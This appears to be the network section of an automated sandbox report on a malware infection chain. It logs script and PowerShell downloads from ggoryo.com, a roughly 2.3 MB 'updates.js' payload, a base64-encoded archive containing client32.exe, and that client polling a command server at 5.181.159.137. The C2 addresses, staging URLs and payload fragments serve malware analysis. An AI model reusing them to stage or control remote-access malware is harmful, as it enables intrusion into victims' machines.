                                                                                                                                                  Oct 8, 2024 15:23:48.431422949 CEST1.1.1.1192.168.2.160x4d2dNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • ggoryo.com
                                                                                                                                                  • 5.181.159.137connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                  • geo.netsupportsoftware.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.16497085.181.159.1374434108C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Oct 8, 2024 15:23:48.018405914 CEST218OUTPOST http://5.181.159.137/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.181.159.137Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                  Data Raw:
                                                                                                                                                  Data Ascii:


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.1649709104.26.1.231804108C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Oct 8, 2024 15:23:49.021406889 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Oct 8, 2024 15:23:49.474644899 CEST937INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 08 Oct 2024 13:23:49 GMT
                                                                                                                                                  Content-Type: text/html; Charset=utf-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  CF-Ray: 8cf672989bec0f5d-EWR
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Cache-Control: private
                                                                                                                                                  Set-Cookie: ASPSESSIONIDQQBRCBDQ=CJDCDIJCPEJICKJPBEEGFCDM; path=/
                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rd8f69diKJvu1OkswtZPunHThzPVIqwdkDJUUtTUcCSddZ5YX3siTFwLUGvQHQMsT4%2BHLm6boOp4PuhQoftK%2FxKNaWOZxzgJGXtjTWt7TR2rKQiL7QRj%2FI3l7vMLGKJ%2FK%2FRLPjS9bPphr07"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 1040.7357,-74.17240


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.164970577.83.199.1124437024C:\Windows\System32\wscript.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-10-08 13:23:28 UTC377OUTPOST /trade/fix.php?6867 HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-ch
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: ggoryo.com
                                                                                                                                                  Content-Length: 7
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  2024-10-08 13:23:28 UTC7OUTData Raw: 31 31 41 58 41 51 3d
                                                                                                                                                  Data Ascii: 11AXAQ=
                                                                                                                                                  2024-10-08 13:23:29 UTC357INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 08 Oct 2024 13:23:29 GMT
                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                  Content-Description: File Transfer
                                                                                                                                                  Content-Disposition: attachment; filename=updates.js
                                                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                                                  Expires: 0
                                                                                                                                                  Cache-Control: must-revalidate
                                                                                                                                                  Pragma: public
                                                                                                                                                  Content-Length: 2306526
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                  2024-10-08 13:23:29 UTC7835INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 20 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6e 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 20 26 26 20 72 65 71 75 69 72 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 66 20 26 26 20 63 29 20 72 65 74 75 72 6e 20 63 28 69 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                  Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 75 6c 6c 0a 7d 2c 20 22 65 73 36 22 29 3b 0a 65 2e 66 69 6e 64 49 6e 74 65 72 6e 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0a 20 20 20 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 20 26 26 20 28 61 20 3d 20 53 74 72 69 6e 67 28 61 29 29 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 66 20 3d 20 61 2e 6c 65 6e 67 74 68 2c 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 3b 20 67 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 61 5b 67 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 63 61 6c 6c 28 63 2c 20 68 2c 20 67 2c 20 61 29
                                                                                                                                                  Data Ascii: return !1 } } } return null}, "es6");e.findInternal = function(a, b, c) { a instanceof String && (a = String(a)); for (var f = a.length, g = 0; g < f; g++) { var h = a[g]; if (b.call(c, h, g, a)
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 62 0a 7d 3b 0a 6b 2e 63 72 61 77 20 3d 20 7b 7d 3b 0a 76 61 72 20 61 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 57 69 6e 64 6f 77 42 6f 75 6e 64 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 69 6d 70 6c 5f 20 3d 20 61 61 3b 0a 6b 2e 63 72 61 77 2e 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 44 65 6c 65 67 61 74 65 20 3d 20 61 61 3b 0a 76 61 72 20 63 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 72 6c 5f 20 3d 20 61 3b 0a 20 20 20 20 74 68 69 73 2e 75 73 65 41 75 74 68 5f 20 3d 20 62 0a 7d 3b 0a 63 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74
                                                                                                                                                  Data Ascii: b};k.craw = {};var aa = function() {};aa.prototype.getWindowBounds = function() {};aa.impl_ = aa;k.craw.AppBackgroundDelegate = aa;var ca = function(a, b) { this.url_ = a; this.useAuth_ = b};ca.prototype.getUrl = function() { return t
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 63 20 3c 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 63 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 66 29 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 2e 6c 65 6e 67 74 68 3b 20 67 20 2b 3d 20 38 31 39 32 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 45 61 28 66 2c 20 67 2c 20 67 20 2b 20 38 31 39 32 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 20 3d 20 50 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6c 20 3d
                                                                                                                                                  Data Ascii: c < arguments.length; c++) { var f = arguments[c]; if (Array.isArray(f)) for (var g = 0; g < f.length; g += 8192) { var h = Ea(f, g, g + 8192); h = Pa.apply(null, h); for (var l =
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 20 20 69 66 20 28 63 20 26 26 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 61 20 3d 20 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 20 22 37 2e 30 22 20 3d 3d 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 20 26 26 20 61 5b 31 5d 29 20 73 77 69 74 63 68 20 28 61 5b 31 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 34 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 22 38 2e 30 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 35 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20
                                                                                                                                                  Data Ascii: if (c && c[1]) if (a = /Trident\/(\d.\d)/.exec(a), "7.0" == c[1]) if (a && a[1]) switch (a[1]) { case "4.0": b = "8.0"; break; case "5.0": b
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 66 61 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 68 65 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 69 77 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 70 73 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 73 64 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73
                                                                                                                                                  Data Ascii: ALE.substring(0, 2).toLowerCase() || "fa" == k.LOCALE.substring(0, 2).toLowerCase() || "he" == k.LOCALE.substring(0, 2).toLowerCase() || "iw" == k.LOCALE.substring(0, 2).toLowerCase() || "ps" == k.LOCALE.substring(0, 2).toLowerCase() || "sd" == k.LOCALE.s
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 74 68 29 20 72 65 74 75 72 6e 20 21 31 3b 0a 20 20 20 20 61 20 3d 20 61 2e 6d 61 74 63 68 28 2f 5b 3f 26 5d 62 6f 64 79 3d 28 5b 5e 26 5d 2a 29 2f 29 5b 31 5d 3b 0a 20 20 20 20 69 66 20 28 21 61 29 20 72 65 74 75 72 6e 20 21 30 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 5e 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 5f 2e 7e 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2b 24 2f 69 2e 74 65 73 74 28 61 29 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 53 61 66 65 55 72 6c 2e 66 72 6f 6d 53 73 68 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                  Data Ascii: th) return !1; a = a.match(/[?&]body=([^&]*)/)[1]; if (!a) return !0; try { decodeURIComponent(a) } catch (c) { return !1 } return /^(?:[a-z0-9\-_.~]|%[0-9a-f]{2})+$/i.test(a)};k.html.SafeUrl.fromSshUrl = function
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 2b 20 62 20 2b 20 27 22 20 72 65 71 75 69 72 65 73 20 67 6f 6f 67 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 20 76 61 6c 75 65 2c 20 22 27 20 2b 20 63 20 2b 20 27 22 20 67 69 76 65 6e 2e 27 20 3a 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 69 6e 20 6b 2e 68 74 6d 6c 2e 53 61 66 65 48 74 6d 6c 2e 55 52 4c 5f 41 54 54 52 49 42 55 54 45 53 5f 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 29 20 63 20 3d 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 2e 75 6e 77 72 61 70 28 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 63 20 69
                                                                                                                                                  Data Ascii: + b + '" requires goog.string.Const value, "' + c + '" given.' : ""); if (b.toLowerCase() in k.html.SafeHtml.URL_ATTRIBUTES_) if (c instanceof k.html.TrustedResourceUrl) c = k.html.TrustedResourceUrl.unwrap(c); else if (c i
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 2c 20 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 74 5c 72 5c 6e 20 5d 2b 7c 5b 5c 74 5c 72 5c 6e 20 5d 2b 24 2f 67 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 20 3d 20 6b 2e 73 74 72 69 6e 67 2e 69 6e 74 65 72 6e 61 6c 2e 74 72 69 6d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 4c 65 66 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 78 61 30 5d 2b 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 52 69 67 68 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 73 5c 78 61 30 5d 2b 24 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 63 61 73
                                                                                                                                                  Data Ascii: , " ").replace(/^[\t\r\n ]+|[\t\r\n ]+$/g, "")};k.string.trim = k.string.internal.trim;k.string.trimLeft = function(a) { return a.replace(/^[\s\xa0]+/, "")};k.string.trimRight = function(a) { return a.replace(/[\s\xa0]+$/, "")};k.string.cas


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.164970777.83.199.1124436704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-10-08 13:23:43 UTC77OUTGET /trade/da.php?9800 HTTP/1.1
                                                                                                                                                  Host: ggoryo.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-10-08 13:23:44 UTC198INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 08 Oct 2024 13:23:44 GMT
                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Connection: close
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  2024-10-08 13:23:44 UTC7994INData Raw: 33 30 30 31 63 38 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30
                                                                                                                                                  Data Ascii: 3001c8UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 35 39 62 6c 4e 75 39 7a 37 6d 46 6c 56 69 35 68 49 68 31 32 46 7a 53 39 4f 36 53 52 54 37 70 53 4c 39 42 76 36 56 38 7a 2f 6a 6e 6e 33 2f 59 58 37 77 72 50 6a 58 2b 48 64 39 48 78 50 63 4e 44 48 65 51 36 39 74 51 50 46 2f 32 77 54 41 6b 37 46 4c 4d 4c 65 77 6a 50 6a 4a 77 51 63 50 48 75 43 44 2b 2f 63 78 76 36 51 53 62 31 77 38 67 30 6e 42 76 54 42 36 49 6d 43 38 55 50 38 70 37 4f 6e 52 66 41 4b 59 50 6d 38 6b 5a 70 4f 39 6e 50 77 69 4f 55 66 33 37 79 74 77 44 37 50 7a 38 76 46 42 66 6a 48 4e 43 38 36 34 62 51 78 67 77 74 50 59 46 65 72 7a 6d 4a 49 61 50 68 6a 76 33 61 66 2b 50 63 68 75 73 4d 6e 53 65 53 58 56 75 48 65 70 6b 4f 76 45 75 2b 73 32 71 35 74 4d 59 7a 2f 4a 6b 2f 67 33 49 2f 37 62 74 51 33 2f 7a 34 73 58 35 74 2f 74 35 66 43 66 46 62 65 55 6a
                                                                                                                                                  Data Ascii: 59blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv6V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7OnRfAKYPm8kZpO9nPwiOUf37ytwD7Pz8vFBfjHNC864bQxgwtPYFerzmJIaPhjv3af+PchusMnSeSXVuHepkOvEu+s2q5tMYz/Jk/g3I/7btQ3/z4sX5t/t5fCfFbeUj
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 51 62 67 4f 49 43 62 4e 32 36 6c 63 65 42 4a 69 78 66 76 72 77 4e 56 71 78 59 77 64 73 52 31 71 31 62 69 32 66 50 6e 6d 50 35 79 71 2b 52 2b 64 30 58 61 4e 6f 53 68 79 75 5a 4d 54 77 57 4d 73 58 44 70 50 6a 65 50 44 34 30 34 33 53 5a 63 62 76 55 4c 73 59 37 38 65 54 78 68 56 74 69 76 63 76 35 38 6e 6a 67 73 2f 47 7a 44 50 49 34 6d 34 6e 79 4d 38 55 69 76 6c 30 34 6a 2f 50 2f 38 4d 4d 50 51 32 6c 2f 4f 2b 6b 35 37 61 6d 6b 2f 48 65 64 37 58 31 70 58 55 62 2b 2b 43 54 76 31 32 76 59 57 74 6e 38 4e 53 35 6b 70 65 44 71 39 6a 6d 63 6e 35 79 62 48 4e 4c 34 78 31 4b 38 69 66 6e 46 4f 66 48 72 32 65 38 55 4c 34 78 69 42 74 30 70 53 6f 61 66 70 5a 53 2f 62 48 38 6f 38 61 64 31 32 7a 35 32 53 30 66 37 77 57 69 65 69 50 2b 58 33 36 37 44 39 6f 31 66 73 54 46 50 77
                                                                                                                                                  Data Ascii: QbgOICbN26lceBJixfvrwNVqxYwdsR1q1bi2fPnmP5yq+R+d0XaNoShyuZMTwWMsXDpPjePD4043SZcbvULsY78eTxhVtivcv58njgs/GzDPI4m4nyM8Uivl04j/P/8MMPQ2l/O+k57amk/Hed7X1pXUb++CTv12vYWtn8NS5kpeDq9jmcn5ybHNL4x1K8ifnFOfHr2e8UL4xiBt0pSoafpZS/bH8o8ad12z52S0f7wWieiP+X367D9o1fsTFPw
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 56 61 47 56 47 46 43 65 5a 56 34 38 75 35 49 32 6d 4a 6c 63 48 2f 6c 66 4d 5a 2f 50 2b 54 74 76 78 49 2f 6d 4e 6a 46 2b 44 76 33 6b 36 39 44 48 58 70 62 2b 41 54 55 31 52 69 61 51 4f 52 46 53 44 53 36 39 47 75 42 31 46 51 35 38 46 64 66 6d 46 66 6b 33 59 51 67 38 51 52 78 6e 70 6f 30 70 48 5a 38 53 70 53 44 41 69 74 51 42 69 34 6d 63 4c 7a 31 4f 36 7a 55 4a 52 5a 44 30 42 56 72 72 30 57 34 48 49 70 4a 6c 36 4b 6f 39 33 56 62 4d 65 31 52 66 34 75 55 58 6a 6d 65 7a 51 50 45 4b 4d 68 30 42 69 6d 39 33 6f 76 72 44 66 34 64 70 4d 70 48 35 4a 6d 4e 6f 41 79 79 30 6e 67 32 57 46 31 37 53 67 45 54 74 62 54 31 76 50 44 67 7a 53 75 4e 56 50 64 32 6b 6f 47 58 32 4d 79 65 4f 6e 64 53 2b 72 50 5a 66 56 61 56 61 6f 76 42 48 30 65 62 62 6f 46 39 42 2f 79 4b 72 36 34 56
                                                                                                                                                  Data Ascii: VaGVGFCeZV48u5I2mJlcH/lfMZ/P+TtvxI/mNjF+Dv3k69DHXpb+ATU1RiaQORFSDS69GuB1FQ58FdfmFfk3YQg8QRxnpo0pHZ8SpSDAitQBi4mcLz1O6zUJRZD0BVrr0W4HIpJl6Ko93VbMe1Rf4uUXjmezQPEKMh0Bim93ovrDf4dpMpH5JmNoAyy0ng2WF17SgETtbT1vPDgzSuNVPd2koGX2MyeOndS+rPZfVaVaovBH0ebboF9B/yKr64V
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 6b 52 54 65 6c 44 6b 4e 36 70 6a 6f 75 4c 71 35 70 74 2f 45 63 34 73 56 33 31 32 50 57 6f 4e 35 6c 44 55 42 32 44 48 71 44 65 2b 47 76 75 46 59 4e 5a 43 31 39 45 71 59 6b 68 72 6b 2b 45 6b 54 4c 51 36 72 57 49 48 6e 4d 36 52 53 44 50 62 32 56 4d 38 73 47 4c 4d 59 37 6f 35 72 36 65 42 78 6c 59 76 61 4b 58 65 5a 62 2b 38 57 6d 30 30 79 58 7a 69 33 6f 75 2b 68 6a 2b 39 69 63 53 30 55 4a 75 7a 4b 78 5a 39 79 48 62 48 36 37 37 43 44 34 2b 68 59 38 76 34 4f 4d 72 2b 50 67 61 50 72 36 44 6a 37 50 77 63 51 45 69 31 5a 7a 31 39 35 4f 67 67 41 67 42 79 39 35 6f 51 4f 35 42 31 71 32 47 31 47 49 36 38 63 55 59 62 64 33 37 39 32 68 57 7a 55 35 65 42 48 44 53 6f 58 72 35 30 4a 38 75 4d 77 68 38 4e 38 76 4e 79 63 54 66 64 78 53 59 2b 77 73 70 33 48 6b 57 50 66 52 77 43
                                                                                                                                                  Data Ascii: kRTelDkN6pjouLq5pt/Ec4sV312PWoN5lDUB2DHqDe+GvuFYNZC19EqYkhrk+EkTLQ6rWIHnM6RSDPb2VM8sGLMY7o5r6eBxlYvaKXeZb+8Wm00yXzi3ou+hj+9icS0UJuzKxZ9yHbH677CD4+hY8v4OMr+PgaPr6Dj7PwcQEi1Zz195OggAgBy95oQO5B1q2G1GI68cUYbd3792hWzU5eBHDSoXr50J8uMwh8N8vNycTfdxSY+wsp3HkWPfRwC
                                                                                                                                                  2024-10-08 13:23:44 UTC16384INData Raw: 50 78 6d 6b 67 34 36 31 36 37 4e 51 52 33 41 44 31 63 2f 34 5a 41 66 76 4e 4d 6a 6f 48 57 55 43 33 38 57 6d 44 4f 4b 72 59 48 55 75 74 76 73 78 76 71 63 2b 30 47 79 48 57 62 4b 75 2b 31 45 38 62 51 4f 61 5a 54 4c 72 6a 6a 7a 74 43 4e 4a 37 75 49 61 43 59 33 79 6e 50 5a 52 31 5a 78 4d 73 4f 66 61 32 4a 7a 53 6d 62 6a 2b 41 75 54 49 39 63 55 53 4a 51 39 70 75 61 2b 4c 4d 6d 52 46 44 44 4a 41 35 75 4e 73 73 63 73 4a 38 44 68 76 47 69 71 76 30 32 50 47 62 2b 51 47 30 6d 5a 6d 54 57 6c 7a 4a 78 56 41 74 67 59 71 59 2b 62 35 44 49 54 65 63 7a 6b 38 4a 6f 43 76 65 57 46 54 4c 36 5a 54 38 45 71 78 6a 49 63 58 6e 6a 73 5a 71 45 5a 6b 75 43 68 66 2f 6c 6d 2b 41 61 52 78 63 68 4e 2f 35 4c 2b 58 34 4a 56 4e 43 45 77 67 5a 46 76 49 2f 50 4d 63 67 62 37 75 44 54 35 56
                                                                                                                                                  Data Ascii: Pxmkg46167NQR3AD1c/4ZAfvNMjoHWUC38WmDOKrYHUutvsxvqc+0GyHWbKu+1E8bQOaZTLrjjztCNJ7uIaCY3ynPZR1ZxMsOfa2JzSmbj+AuTI9cUSJQ9pua+LMmRFDDJA5uNsscsJ8DhvGiqv02PGb+QG0mZmTWlzJxVAtgYqY+b5DITeczk8JoCveWFTL6ZT8EqxjIcXnjsZqEZkuChf/lm+AaRxchN/5L+X4JVNCEwgZFvI/PMcgb7uDT5V
